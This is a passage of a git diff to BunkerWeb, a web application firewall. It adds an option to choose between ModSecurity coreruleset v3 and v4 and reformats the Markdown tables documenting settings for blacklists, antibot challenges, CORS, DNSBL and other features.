diff --git a/.prettierignore b/.prettierignore index 5565c0f27..dfb55c594 100644 --- a/.prettierignore +++ b/.prettierignore @@ -2,7 +2,7 @@ docs/ env/ */env/ *.min* -src/common/core/modsecurity/ +src/common/core/modsecurity/files/ src/deps/src/ mkdocs.yml CHANGELOG.md diff --git a/CHANGELOG.md b/CHANGELOG.md index cdb9d0e01..d59834d3a 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -15,6 +15,7 @@ - [FEATURE] Add new Metrics core plugin that will allow metrics collection and retrieval of internal metrics - [FEATURE] Add setting DATABASE_LOG_LEVEL to control SQLAlchemy loggers separately from the main one - [FEATURE] Add whitelist check for the default-server as well +- [FEATURE] Add the possibility to choose between the coreruleset v3 and v4 that will be used by ModSecurity (default is v3) - [MISC] Add a better custom certificate cache handling - [MISC] Updated Linux base images in Dockerfiles - [MISC] Add recommended dialects to databases string @@ -25,7 +26,8 @@ - [DEPS] Updated lua-resty-core to v0.1.28 - [DEPS] Updated zlib version to v1.3.1 - [DEPS] Updated ModSecurity version to v3.0.12 -- [DEPS] Updated coreruleset version to v4.0.0 +- [DEPS] Updated coreruleset version to v3.3.5 +- [DEPS] Added coreruleset version v4.0.0 - [DEPS] Updated lua-resty-mlcache version to v2.7.0 ## v1.5.5 - 2024/01/12 diff --git a/docs/settings.md b/docs/settings.md index c346266b8..4f7f4b08f 100644 --- a/docs/settings.md +++ b/docs/settings.md @@ -15,39 +15,40 @@ When settings are considered as "multiple", it means that you can have multiple STREAM support :warning: -| Setting | Default | Context |Multiple| Description | -|------------------------------|------------------------------------------------------------------------------------------------------------------------|---------|--------|--------------------------------------------------| -|`IS_LOADING` |`no` |global |no |Internal use : set to yes when BW is loading. | -|`NGINX_PREFIX` |`/etc/nginx/` |global |no |Where nginx will search for configurations. | -|`HTTP_PORT` |`8080` |global |no |HTTP port number which bunkerweb binds to. | -|`HTTPS_PORT` |`8443` |global |no |HTTPS port number which bunkerweb binds to. | -|`MULTISITE` |`no` |global |no |Multi site activation. | -|`SERVER_NAME` |`www.example.com` |multisite|no |List of the virtual hosts served by bunkerweb. | -|`WORKER_PROCESSES` |`auto` |global |no |Number of worker processes. | -|`WORKER_RLIMIT_NOFILE` |`2048` |global |no |Maximum number of open files for worker processes.| -|`WORKER_CONNECTIONS` |`1024` |global |no |Maximum number of connections per worker. | -|`LOG_FORMAT` |`$host $remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent "$http_referer" "$http_user_agent"`|global |no |The format to use for access logs. | -|`LOG_LEVEL` |`notice` |global |no |The level to use for error logs. | -|`DNS_RESOLVERS` |`127.0.0.11` |global |no |DNS addresses of resolvers to use. | -|`DATASTORE_MEMORY_SIZE` |`64m` |global |no |Size of the internal datastore. | -|`CACHESTORE_MEMORY_SIZE` |`64m` |global |no |Size of the internal cachestore. | -|`CACHESTORE_IPC_MEMORY_SIZE` |`16m` |global |no |Size of the internal cachestore (ipc). | -|`CACHESTORE_MISS_MEMORY_SIZE` |`16m` |global |no |Size of the internal cachestore (miss). | -|`CACHESTORE_LOCKS_MEMORY_SIZE`|`16m` |global |no |Size of the internal cachestore (locks). | -|`USE_API` |`yes` |global |no |Activate the API to control BunkerWeb. | -|`API_HTTP_PORT` |`5000` |global |no |Listen port number for the API. | -|`API_LISTEN_IP` |`0.0.0.0` |global |no |Listen IP address for the API. | -|`API_SERVER_NAME` |`bwapi` |global |no |Server name (virtual host) for the API. | -|`API_WHITELIST_IP` |`127.0.0.0/8` |global |no |List of IP/network allowed to contact the API. | -|`AUTOCONF_MODE` |`no` |global |no |Enable Autoconf Docker integration. | -|`SWARM_MODE` |`no` |global |no |Enable Docker Swarm integration. | -|`KUBERNETES_MODE` |`no` |global |no |Enable Kubernetes integration. | -|`SERVER_TYPE` |`http` |multisite|no |Server type : http or stream. | -|`LISTEN_STREAM` |`yes` |multisite|no |Enable listening for non-ssl (passthrough). | -|`LISTEN_STREAM_PORT` |`1337` |multisite|no |Listening port for non-ssl (passthrough). | -|`LISTEN_STREAM_PORT_SSL` |`4242` |multisite|no |Listening port for ssl (passthrough). | -|`USE_UDP` |`no` |multisite|no |UDP listen instead of TCP (stream). | -|`USE_IPV6` |`no` |global |no |Enable IPv6 connectivity. | +| Setting | Default | Context | Multiple | Description | +| ------------------------------ | ------------------------------------------------------------------------------------------------------------------------ | --------- | -------- | ------------------------------------------------------------ | +| `IS_LOADING` | `no` | global | no | Internal use : set to yes when BW is loading. | +| `NGINX_PREFIX` | `/etc/nginx/` | global | no | Where nginx will search for configurations. | +| `HTTP_PORT` | `8080` | global | no | HTTP port number which bunkerweb binds to. | +| `HTTPS_PORT` | `8443` | global | no | HTTPS port number which bunkerweb binds to. | +| `MULTISITE` | `no` | global | no | Multi site activation. | +| `SERVER_NAME` | `www.example.com` | multisite | no | List of the virtual hosts served by bunkerweb. | +| `WORKER_PROCESSES` | `auto` | global | no | Number of worker processes. | +| `WORKER_RLIMIT_NOFILE` | `2048` | global | no | Maximum number of open files for worker processes. | +| `WORKER_CONNECTIONS` | `1024` | global | no | Maximum number of connections per worker. | +| `LOG_FORMAT` | `$host $remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent "$http_referer" "$http_user_agent"` | global | no | The format to use for access logs. | +| `LOG_LEVEL` | `notice` | global | no | The level to use for error logs. | +| `DNS_RESOLVERS` | `127.0.0.11` | global | no | DNS addresses of resolvers to use. | +| `DATASTORE_MEMORY_SIZE` | `64m` | global | no | Size of the internal datastore. | +| `CACHESTORE_MEMORY_SIZE` | `64m` | global | no | Size of the internal cachestore. | +| `CACHESTORE_IPC_MEMORY_SIZE` | `16m` | global | no | Size of the internal cachestore (ipc). | +| `CACHESTORE_MISS_MEMORY_SIZE` | `16m` | global | no | Size of the internal cachestore (miss). | +| `CACHESTORE_LOCKS_MEMORY_SIZE` | `16m` | global | no | Size of the internal cachestore (locks). | +| `USE_API` | `yes` | global | no | Activate the API to control BunkerWeb. | +| `API_HTTP_PORT` | `5000` | global | no | Listen port number for the API. | +| `API_LISTEN_IP` | `0.0.0.0` | global | no | Listen IP address for the API. | +| `API_SERVER_NAME` | `bwapi` | global | no | Server name (virtual host) for the API. | +| `API_WHITELIST_IP` | `127.0.0.0/8` | global | no | List of IP/network allowed to contact the API. | +| `AUTOCONF_MODE` | `no` | global | no | Enable Autoconf Docker integration. | +| `SWARM_MODE` | `no` | global | no | Enable Docker Swarm integration. | +| `KUBERNETES_MODE` | `no` | global | no | Enable Kubernetes integration. | +| `SERVER_TYPE` | `http` | multisite | no | Server type : http or stream. | +| `LISTEN_STREAM` | `yes` | multisite | no | Enable listening for non-ssl (passthrough). | +| `LISTEN_STREAM_PORT` | `1337` | multisite | no | Listening port for non-ssl (passthrough). | +| `LISTEN_STREAM_PORT_SSL` | `4242` | multisite | no | Listening port for ssl (passthrough). | +| `USE_UDP` | `no` | multisite | no | UDP listen instead of TCP (stream). | +| `USE_IPV6` | `no` | global | no | Enable IPv6 connectivity. | +| `IS_DRAFT` | `no` | multisite | no | Internal use : set to yes when the service is in draft mode. | ## Core settings @@ -58,19 +59,19 @@ STREAM support :x: Bot detection by using a challenge. -| Setting | Default | Context |Multiple| Description | -|---------------------------|------------|---------|--------|------------------------------------------------------------------------------------------------------------------------------| -|`USE_ANTIBOT` |`no` |multisite|no |Activate antibot feature. | -|`ANTIBOT_URI` |`/challenge`|multisite|no |Unused URI that clients will be redirected to to solve the challenge. | -|`ANTIBOT_RECAPTCHA_SCORE` |`0.7` |multisite|no |Minimum score required for reCAPTCHA challenge. | -|`ANTIBOT_RECAPTCHA_SITEKEY`| |multisite|no |Sitekey for reCAPTCHA challenge. | -|`ANTIBOT_RECAPTCHA_SECRET` | |multisite|no |Secret for reCAPTCHA challenge. | -|`ANTIBOT_HCAPTCHA_SITEKEY` | |multisite|no |Sitekey for hCaptcha challenge. | -|`ANTIBOT_HCAPTCHA_SECRET` | |multisite|no |Secret for hCaptcha challenge. | -|`ANTIBOT_TURNSTILE_SITEKEY`| |multisite|no |Sitekey for Turnstile challenge. | -|`ANTIBOT_TURNSTILE_SECRET` | |multisite|no |Secret for Turnstile challenge. | -|`ANTIBOT_TIME_RESOLVE` |`60` |multisite|no |Maximum time (in seconds) clients have to resolve the challenge. Once this time has passed, a new challenge will be generated.| -|`ANTIBOT_TIME_VALID` |`86400` |multisite|no |Maximum validity time of solved challenges. Once this time has passed, clients will need to resolve a new one. | +| Setting | Default | Context | Multiple | Description | +| --------------------------- | ------------ | --------- | -------- | ------------------------------------------------------------------------------------------------------------------------------ | +| `USE_ANTIBOT` | `no` | multisite | no | Activate antibot feature. | +| `ANTIBOT_URI` | `/challenge` | multisite | no | Unused URI that clients will be redirected to to solve the challenge. | +| `ANTIBOT_RECAPTCHA_SCORE` | `0.7` | multisite | no | Minimum score required for reCAPTCHA challenge. | +| `ANTIBOT_RECAPTCHA_SITEKEY` | | multisite | no | Sitekey for reCAPTCHA challenge. | +| `ANTIBOT_RECAPTCHA_SECRET` | | multisite | no | Secret for reCAPTCHA challenge. | +| `ANTIBOT_HCAPTCHA_SITEKEY` | | multisite | no | Sitekey for hCaptcha challenge. | +| `ANTIBOT_HCAPTCHA_SECRET` | | multisite | no | Secret for hCaptcha challenge. | +| `ANTIBOT_TURNSTILE_SITEKEY` | | multisite | no | Sitekey for Turnstile challenge. | +| `ANTIBOT_TURNSTILE_SECRET` | | multisite | no | Secret for Turnstile challenge. | +| `ANTIBOT_TIME_RESOLVE` | `60` | multisite | no | Maximum time (in seconds) clients have to resolve the challenge. Once this time has passed, a new challenge will be generated. | +| `ANTIBOT_TIME_VALID` | `86400` | multisite | no | Maximum validity time of solved challenges. Once this time has passed, clients will need to resolve a new one. | ### Auth basic @@ -78,13 +79,13 @@ STREAM support :x: Enforce login before accessing a resource or the whole site using HTTP basic auth method. -| Setting | Default | Context |Multiple| Description | -|---------------------|-----------------|---------|--------|------------------------------------------------| -|`USE_AUTH_BASIC` |`no` |multisite|no |Use HTTP basic auth | -|`AUTH_BASIC_LOCATION`|`sitewide` |multisite|no |URL of the protected resource or sitewide value.| -|`AUTH_BASIC_USER` |`changeme` |multisite|no |Username | -|`AUTH_BASIC_PASSWORD`|`changeme` |multisite|no |Password | -|`AUTH_BASIC_TEXT` |`Restricted area`|multisite|no |Text to display | +| Setting | Default | Context | Multiple | Description | +| --------------------- | ----------------- | --------- | -------- | ------------------------------------------------ | +| `USE_AUTH_BASIC` | `no` | multisite | no | Use HTTP basic auth | +| `AUTH_BASIC_LOCATION` | `sitewide` | multisite | no | URL of the protected resource or sitewide value. | +| `AUTH_BASIC_USER` | `changeme` | multisite | no | Username | +| `AUTH_BASIC_PASSWORD` | `changeme` | multisite | no | Password | +| `AUTH_BASIC_TEXT` | `Restricted area` | multisite | no | Text to display | ### Bad behavior @@ -92,13 +93,13 @@ STREAM support :white_check_mark: Ban IP generating too much 'bad' HTTP status code in a period of time. -| Setting | Default | Context |Multiple| Description | -|---------------------------|-----------------------------|---------|--------|--------------------------------------------------------------------------------------------| -|`USE_BAD_BEHAVIOR` |`yes` |multisite|no |Activate Bad behavior feature. | -|`BAD_BEHAVIOR_STATUS_CODES`|`400 401 403 404 405 429 444`|multisite|no |List of HTTP status codes considered as 'bad'. | -|`BAD_BEHAVIOR_BAN_TIME` |`86400` |multisite|no |The duration time (in seconds) of a ban when the corresponding IP has reached the threshold.| -|`BAD_BEHAVIOR_THRESHOLD` |`10` |multisite|no |Maximum number of 'bad' HTTP status codes within the period of time before IP is banned. | -|`BAD_BEHAVIOR_COUNT_TIME` |`60` |multisite|no |Period of time (in seconds) during which we count 'bad' HTTP status codes. | +| Setting | Default | Context | Multiple | Description | +| --------------------------- | ----------------------------- | --------- | -------- | -------------------------------------------------------------------------------------------- | +| `USE_BAD_BEHAVIOR` | `yes` | multisite | no | Activate Bad behavior feature. | +| `BAD_BEHAVIOR_STATUS_CODES` | `400 401 403 404 405 429 444` | multisite | no | List of HTTP status codes considered as 'bad'. | +| `BAD_BEHAVIOR_BAN_TIME` | `86400` | multisite | no | The duration time (in seconds) of a ban when the corresponding IP has reached the threshold. | +| `BAD_BEHAVIOR_THRESHOLD` | `10` | multisite | no | Maximum number of 'bad' HTTP status codes within the period of time before IP is banned. | +| `BAD_BEHAVIOR_COUNT_TIME` | `60` | multisite | no | Period of time (in seconds) during which we count 'bad' HTTP status codes. | ### Blacklist @@ -106,30 +107,30 @@ STREAM support :warning: Deny access based on internal and external IP/network/rDNS/ASN blacklists. -| Setting | Default | Context |Multiple| Description | -|----------------------------------|------------------------------------------------------------------------------------------------------------------------------|---------|--------|------------------------------------------------------------------------------------------------| -|`USE_BLACKLIST` |`yes` |multisite|no |Activate blacklist feature. | -|`BLACKLIST_IP` | |multisite|no |List of IP/network, separated with spaces, to block. | -|`BLACKLIST_IP_URLS` |`https://www.dan.me.uk/torlist/?exit` |global |no |List of URLs, separated with spaces, containing bad IP/network to block. | -|`BLACKLIST_RDNS_GLOBAL` |`yes` |multisite|no |Only perform RDNS blacklist checks on global IP addresses. | -|`BLACKLIST_RDNS` |`.shodan.io .censys.io` |multisite|no |List of reverse DNS suffixes, separated with spaces, to block. | -|`BLACKLIST_RDNS_URLS` | |global |no |List of URLs, separated with spaces, containing reverse DNS suffixes to block. | -|`BLACKLIST_ASN` | |multisite|no |List of ASN numbers, separated with spaces, to block. | -|`BLACKLIST_ASN_URLS` | |global |no |List of URLs, separated with spaces, containing ASN to block. | -|`BLACKLIST_USER_AGENT` | |multisite|no |List of User-Agent (PCRE regex), separated with spaces, to block. | -|`BLACKLIST_USER_AGENT_URLS` |`https://raw.githubusercontent.com/mitchellkrogza/nginx-ultimate-bad-bot-blocker/master/_generator_lists/bad-user-agents.list`|global |no |List of URLs, separated with spaces, containing bad User-Agent to block. | -|`BLACKLIST_URI` | |multisite|no |List of URI (PCRE regex), separated with spaces, to block. | -|`BLACKLIST_URI_URLS` | |global |no |List of URLs, separated with spaces, containing bad URI to block. | -|`BLACKLIST_IGNORE_IP` | |multisite|no |List of IP/network, separated with spaces, to ignore in the blacklist. | -|`BLACKLIST_IGNORE_IP_URLS` | |global |no |List of URLs, separated with spaces, containing IP/network to ignore in the blacklist. | -|`BLACKLIST_IGNORE_RDNS` | |multisite|no |List of reverse DNS suffixes, separated with spaces, to ignore in the blacklist. | -|`BLACKLIST_IGNORE_RDNS_URLS` | |global |no |List of URLs, separated with spaces, containing reverse DNS suffixes to ignore in the blacklist.| -|`BLACKLIST_IGNORE_ASN` | |multisite|no |List of ASN numbers, separated with spaces, to ignore in the blacklist. | -|`BLACKLIST_IGNORE_ASN_URLS` | |global |no |List of URLs, separated with spaces, containing ASN to ignore in the blacklist. | -|`BLACKLIST_IGNORE_USER_AGENT` | |multisite|no |List of User-Agent (PCRE regex), separated with spaces, to ignore in the blacklist. | -|`BLACKLIST_IGNORE_USER_AGENT_URLS`| |global |no |List of URLs, separated with spaces, containing User-Agent to ignore in the blacklist. | -|`BLACKLIST_IGNORE_URI` | |multisite|no |List of URI (PCRE regex), separated with spaces, to ignore in the blacklist. | -|`BLACKLIST_IGNORE_URI_URLS` | |global |no |List of URLs, separated with spaces, containing URI to ignore in the blacklist. | +| Setting | Default | Context | Multiple | Description | +| ---------------------------------- | ------------------------------------------------------------------------------------------------------------------------------ | --------- | -------- | ------------------------------------------------------------------------------------------------ | +| `USE_BLACKLIST` | `yes` | multisite | no | Activate blacklist feature. | +| `BLACKLIST_IP` | | multisite | no | List of IP/network, separated with spaces, to block. | +| `BLACKLIST_IP_URLS` | `https://www.dan.me.uk/torlist/?exit` | global | no | List of URLs, separated with spaces, containing bad IP/network to block. | +| `BLACKLIST_RDNS_GLOBAL` | `yes` | multisite | no | Only perform RDNS blacklist checks on global IP addresses. | +| `BLACKLIST_RDNS` | `.shodan.io .censys.io` | multisite | no | List of reverse DNS suffixes, separated with spaces, to block. | +| `BLACKLIST_RDNS_URLS` | | global | no | List of URLs, separated with spaces, containing reverse DNS suffixes to block. | +| `BLACKLIST_ASN` | | multisite | no | List of ASN numbers, separated with spaces, to block. | +| `BLACKLIST_ASN_URLS` | | global | no | List of URLs, separated with spaces, containing ASN to block. | +| `BLACKLIST_USER_AGENT` | | multisite | no | List of User-Agent (PCRE regex), separated with spaces, to block. | +| `BLACKLIST_USER_AGENT_URLS` | `https://raw.githubusercontent.com/mitchellkrogza/nginx-ultimate-bad-bot-blocker/master/_generator_lists/bad-user-agents.list` | global | no | List of URLs, separated with spaces, containing bad User-Agent to block. | +| `BLACKLIST_URI` | | multisite | no | List of URI (PCRE regex), separated with spaces, to block. | +| `BLACKLIST_URI_URLS` | | global | no | List of URLs, separated with spaces, containing bad URI to block. | +| `BLACKLIST_IGNORE_IP` | | multisite | no | List of IP/network, separated with spaces, to ignore in the blacklist. | +| `BLACKLIST_IGNORE_IP_URLS` | | global | no | List of URLs, separated with spaces, containing IP/network to ignore in the blacklist. | +| `BLACKLIST_IGNORE_RDNS` | | multisite | no | List of reverse DNS suffixes, separated with spaces, to ignore in the blacklist. | +| `BLACKLIST_IGNORE_RDNS_URLS` | | global | no | List of URLs, separated with spaces, containing reverse DNS suffixes to ignore in the blacklist. | +| `BLACKLIST_IGNORE_ASN` | | multisite | no | List of ASN numbers, separated with spaces, to ignore in the blacklist. | +| `BLACKLIST_IGNORE_ASN_URLS` | | global | no | List of URLs, separated with spaces, containing ASN to ignore in the blacklist. | +| `BLACKLIST_IGNORE_USER_AGENT` | | multisite | no | List of User-Agent (PCRE regex), separated with spaces, to ignore in the blacklist. | +| `BLACKLIST_IGNORE_USER_AGENT_URLS` | | global | no | List of URLs, separated with spaces, containing User-Agent to ignore in the blacklist. | +| `BLACKLIST_IGNORE_URI` | | multisite | no | List of URI (PCRE regex), separated with spaces, to ignore in the blacklist. | +| `BLACKLIST_IGNORE_URI_URLS` | | global | no | List of URLs, separated with spaces, containing URI to ignore in the blacklist. | ### Brotli @@ -137,12 +138,12 @@ STREAM support :x: Compress HTTP requests with the brotli algorithm. -| Setting | Default | Context |Multiple| Description | -|-------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------|--------|-------------------------------------------------------| -|`USE_BROTLI` |`no` |multisite|no |Use brotli | -|`BROTLI_TYPES` |`application/atom+xml application/javascript application/json application/rss+xml application/vnd.ms-fontobject application/x-font-opentype application/x-font-truetype application/x-font-ttf application/x-javascript application/xhtml+xml application/xml font/eot font/opentype font/otf font/truetype image/svg+xml image/vnd.microsoft.icon image/x-icon image/x-win-bitmap text/css text/javascript text/plain text/xml`|multisite|no |List of MIME types that will be compressed with brotli.| -|`BROTLI_MIN_LENGTH`|`1000` |multisite|no |Minimum length for brotli compression. | -|`BROTLI_COMP_LEVEL`|`6` |multisite|no |The compression level of the brotli algorithm. | +| Setting | Default | Context | Multiple | Description | +| ------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------- | -------- | ------------------------------------------------------- | +| `USE_BROTLI` | `no` | multisite | no | Use brotli | +| `BROTLI_TYPES` | `application/atom+xml application/javascript application/json application/rss+xml application/vnd.ms-fontobject application/x-font-opentype application/x-font-truetype application/x-font-ttf application/x-javascript application/xhtml+xml application/xml font/eot font/opentype font/otf font/truetype image/svg+xml image/vnd.microsoft.icon image/x-icon image/x-win-bitmap text/css text/javascript text/plain text/xml` | multisite | no | List of MIME types that will be compressed with brotli. | +| `BROTLI_MIN_LENGTH` | `1000` | multisite | no | Minimum length for brotli compression. | +| `BROTLI_COMP_LEVEL` | `6` | multisite | no | The compression level of the brotli algorithm. | ### BunkerNet @@ -150,10 +151,10 @@ STREAM support :white_check_mark: Share threat data with other BunkerWeb instances via BunkerNet. -| Setting | Default | Context |Multiple| Description | -|------------------|--------------------------|---------|--------|-----------------------------| -|`USE_BUNKERNET` |`yes` |multisite|no |Activate BunkerNet feature. | -|`BUNKERNET_SERVER`|`https://api.bunkerweb.io`|global |no |Address of the BunkerNet API.| +| Setting | Default | Context | Multiple | Description | +| ------------------ | -------------------------- | --------- | -------- | ----------------------------- | +| `USE_BUNKERNET` | `yes` | multisite | no | Activate BunkerNet feature. | +| `BUNKERNET_SERVER` | `https://api.bunkerweb.io` | global | no | Address of the BunkerNet API. | ### CORS @@ -161,19 +162,19 @@ STREAM support :x: Cross-Origin Resource Sharing. -| Setting | Default | Context |Multiple| Description | -|------------------------------|------------------------------------------------------------------------------------|---------|--------|-------------------------------------------------------------------| -|`USE_CORS` |`no` |multisite|no |Use CORS | -|`CORS_ALLOW_ORIGIN` |`*` |multisite|no |Allowed origins to make CORS requests : PCRE regex or *. | -|`CORS_EXPOSE_HEADERS` |`Content-Length,Content-Range` |multisite|no |Value of the Access-Control-Expose-Headers header. | -|`CROSS_ORIGIN_OPENER_POLICY` | |multisite|no |Value for the Cross-Origin-Opener-Policy header. | -|`CROSS_ORIGIN_EMBEDDER_POLICY`| |multisite|no |Value for the Cross-Origin-Embedder-Policy header. | -|`CROSS_ORIGIN_RESOURCE_POLICY`| |multisite|no |Value for the Cross-Origin-Resource-Policy header. | -|`CORS_MAX_AGE` |`86400` |multisite|no |Value of the Access-Control-Max-Age header. | -|`CORS_ALLOW_CREDENTIALS` |`no` |multisite|no |Send the Access-Control-Allow-Credentials header. | -|`CORS_ALLOW_METHODS` |`GET, POST, OPTIONS` |multisite|no |Value of the Access-Control-Allow-Methods header. | -|`CORS_ALLOW_HEADERS` |`DNT,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range`|multisite|no |Value of the Access-Control-Allow-Headers header. | -|`CORS_DENY_REQUEST` |`yes` |multisite|no |Deny request and don't send it to backend if Origin is not allowed.| +| Setting | Default | Context | Multiple | Description | +| ------------------------------ | ------------------------------------------------------------------------------------ | --------- | -------- | ------------------------------------------------------------------- | +| `USE_CORS` | `no` | multisite | no | Use CORS | +| `CORS_ALLOW_ORIGIN` | `*` | multisite | no | Allowed origins to make CORS requests : PCRE regex or *. | +| `CORS_EXPOSE_HEADERS` | `Content-Length,Content-Range` | multisite | no | Value of the Access-Control-Expose-Headers header. | +| `CROSS_ORIGIN_OPENER_POLICY` | | multisite | no | Value for the Cross-Origin-Opener-Policy header. | +| `CROSS_ORIGIN_EMBEDDER_POLICY` | | multisite | no | Value for the Cross-Origin-Embedder-Policy header. | +| `CROSS_ORIGIN_RESOURCE_POLICY` | | multisite | no | Value for the Cross-Origin-Resource-Policy header. | +| `CORS_MAX_AGE` | `86400` | multisite | no | Value of the Access-Control-Max-Age header. | +| `CORS_ALLOW_CREDENTIALS` | `no` | multisite | no | Send the Access-Control-Allow-Credentials header. | +| `CORS_ALLOW_METHODS` | `GET, POST, OPTIONS` | multisite | no | Value of the Access-Control-Allow-Methods header. | +| `CORS_ALLOW_HEADERS` | `DNT,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range` | multisite | no | Value of the Access-Control-Allow-Headers header. | +| `CORS_DENY_REQUEST` | `yes` | multisite | no | Deny request and don't send it to backend if Origin is not allowed. | ### Client cache @@ -181,12 +182,12 @@ STREAM support :x: Manage caching for clients. -| Setting | Default | Context |Multiple| Description | -|-------------------------|------------------------------------------------------------|---------|--------|--------------------------------------------------------------------| -|`USE_CLIENT_CACHE` |`no` |multisite|no |Tell client to store locally static files. | -|`CLIENT_CACHE_EXTENSIONS`|`jpg|jpeg|png|bmp|ico|svg|tif|css|js|otf|ttf|eot|woff|woff2`|global |no |List of file extensions, separated with pipes that should be cached.| -|`CLIENT_CACHE_ETAG` |`yes` |multisite|no |Send the HTTP ETag header for static resources. | -|`CLIENT_CACHE_CONTROL` |`public, max-age=15552000` |multisite|no |Value of the Cache-Control HTTP header. | +| Setting | Default | Context | Multiple | Description | +| ------------------------- | -------------------------- | --------- | -------- | ----------------------------------------------- | +| `USE_CLIENT_CACHE` | `no` | multisite | no | Tell client to store locally static files. | +| `CLIENT_CACHE_EXTENSIONS` | `jpg | jpeg | png | bmp | ico | svg | tif | css | js | otf | ttf | eot | woff | woff2` | global | no | List of file extensions, separated with pipes that should be cached. | +| `CLIENT_CACHE_ETAG` | `yes` | multisite | no | Send the HTTP ETag header for static resources. | +| `CLIENT_CACHE_CONTROL` | `public, max-age=15552000` | multisite | no | Value of the Cache-Control HTTP header. | ### Country @@ -194,10 +195,10 @@ STREAM support :white_check_mark: Deny access based on the country of the client IP. -| Setting |Default| Context |Multiple| Description | -|-------------------|-------|---------|--------|--------------------------------------------------------------------------------------------------------------| -|`BLACKLIST_COUNTRY`| |multisite|no |Deny access if the country of the client is in the list (ISO 3166-1 alpha-2 format separated with spaces). | -|`WHITELIST_COUNTRY`| |multisite|no |Deny access if the country of the client is not in the list (ISO 3166-1 alpha-2 format separated with spaces).| +| Setting | Default | Context | Multiple | Description | +| ------------------- | ------- | --------- | -------- | -------------------------------------------------------------------------------------------------------------- | +| `BLACKLIST_COUNTRY` | | multisite | no | Deny access if the country of the client is in the list (ISO 3166-1 alpha-2 format separated with spaces). | +| `WHITELIST_COUNTRY` | | multisite | no | Deny access if the country of the client is not in the list (ISO 3166-1 alpha-2 format separated with spaces). | ### Custom HTTPS certificate @@ -205,13 +206,13 @@ STREAM support :white_check_mark: Choose custom certificate for HTTPS. -| Setting |Default| Context |Multiple| Description | -|----------------------|-------|---------|--------|--------------------------------------------------------------------------------| -|`USE_CUSTOM_SSL` |`no` |multisite|no |Use custom HTTPS certificate. | -|`CUSTOM_SSL_CERT` | |multisite|no |Full path of the certificate or bundle file (must be readable by the scheduler).| -|`CUSTOM_SSL_KEY` | |multisite|no |Full path of the key file (must be readable by the scheduler). | -|`CUSTOM_SSL_CERT_DATA`| |multisite|no |Certificate data encoded in base64. | -|`CUSTOM_SSL_KEY_DATA` | |multisite|no |Key data encoded in base64. | +| Setting | Default | Context | Multiple | Description | +| ---------------------- | ------- | --------- | -------- | -------------------------------------------------------------------------------- | +| `USE_CUSTOM_SSL` | `no` | multisite | no | Use custom HTTPS certificate. | +| `CUSTOM_SSL_CERT` | | multisite | no | Full path of the certificate or bundle file (must be readable by the scheduler). | +| `CUSTOM_SSL_KEY` | | multisite | no | Full path of the key file (must be readable by the scheduler). | +| `CUSTOM_SSL_CERT_DATA` | | multisite | no | Certificate data encoded in base64. | +| `CUSTOM_SSL_KEY_DATA` | | multisite | no | Key data encoded in base64. | ### DB @@ -219,9 +220,10 @@ STREAM support :white_check_mark: Integrate easily the Database. -| Setting | Default |Context|Multiple| Description | -|--------------|-----------------------------------------|-------|--------|--------------------------------------------------| -|`DATABASE_URI`|`sqlite:////var/lib/bunkerweb/db.sqlite3`|global |no |The database URI, following the sqlalchemy format.| +| Setting | Default | Context | Multiple | Description | +| -------------------- | ----------------------------------------- | ------- | -------- | -------------------------------------------------- | +| `DATABASE_URI` | `sqlite:////var/lib/bunkerweb/db.sqlite3` | global | no | The database URI, following the sqlalchemy format. | +| `DATABASE_LOG_LEVEL` | `warning` | global | no | The level to use for database logs. | ### DNSBL @@ -229,10 +231,10 @@ STREAM support :white_check_mark: Deny access based on external DNSBL servers. -| Setting | Default | Context |Multiple| Description | -|------------|----------------------------------------------------------------------------|---------|--------|-----------------------| -|`USE_DNSBL` |`yes` |multisite|no |Activate DNSBL feature.| -|`DNSBL_LIST`|`bl.blocklist.de problems.dnsbl.sorbs.net sbl.spamhaus.org xbl.spamhaus.org`|global |no |List of DNSBL servers. | +| Setting | Default | Context | Multiple | Description | +| ------------ | ---------------------------------------------------------------------------- | --------- | -------- | ----------------------- | +| `USE_DNSBL` | `yes` | multisite | no | Activate DNSBL feature. | +| `DNSBL_LIST` | `bl.blocklist.de problems.dnsbl.sorbs.net sbl.spamhaus.org xbl.spamhaus.org` | global | no | List of DNSBL servers. | ### Errors @@ -240,10 +242,10 @@ STREAM support :x: Manage default error pages -| Setting | Default | Context |Multiple| Description | -|-------------------------|-------------------------------------------------|---------|--------|------------------------------------------------------------------------------------------------------------------------| -|`ERRORS` | |multisite|no |List of HTTP error code and corresponding error pages, separated with spaces (404=/my404.html 403=/errors/403.html ...).| -|`INTERCEPTED_ERROR_CODES`|`400 401 403 404 405 413 429 500 501 502 503 504`|multisite|no |List of HTTP error code intercepted by BunkerWeb | +| Setting | Default | Context | Multiple | Description | +| ------------------------- | ------------------------------------------------- | --------- | -------- | ------------------------------------------------------------------------------------------------------------------------ | +| `ERRORS` | | multisite | no | List of HTTP error code and corresponding error pages, separated with spaces (404=/my404.html 403=/errors/403.html ...). | +| `INTERCEPTED_ERROR_CODES` | `400 401 403 404 405 413 429 500 501 502 503 504` | multisite | no | List of HTTP error code intercepted by BunkerWeb | ### Greylist @@ -251,20 +253,20 @@ STREAM support :warning: Allow access while keeping security features based on internal and external IP/network/rDNS/ASN greylists. -| Setting |Default| Context |Multiple| Description | -|--------------------------|-------|---------|--------|----------------------------------------------------------------------------------------------| -|`USE_GREYLIST` |`no` |multisite|no |Activate greylist feature. | -|`GREYLIST_IP` | |multisite|no |List of IP/network, separated with spaces, to put into the greylist. | -|`GREYLIST_IP_URLS` | |global |no |List of URLs, separated with spaces, containing good IP/network to put into the greylist. | -|`GREYLIST_RDNS_GLOBAL` |`yes` |multisite|no |Only perform RDNS greylist checks on global IP addresses. | -|`GREYLIST_RDNS` | |multisite|no |List of reverse DNS suffixes, separated with spaces, to put into the greylist. | -|`GREYLIST_RDNS_URLS` | |global |no |List of URLs, separated with spaces, containing reverse DNS suffixes to put into the greylist.| -|`GREYLIST_ASN` | |multisite|no |List of ASN numbers, separated with spaces, to put into the greylist. | -|`GREYLIST_ASN_URLS` | |global |no |List of URLs, separated 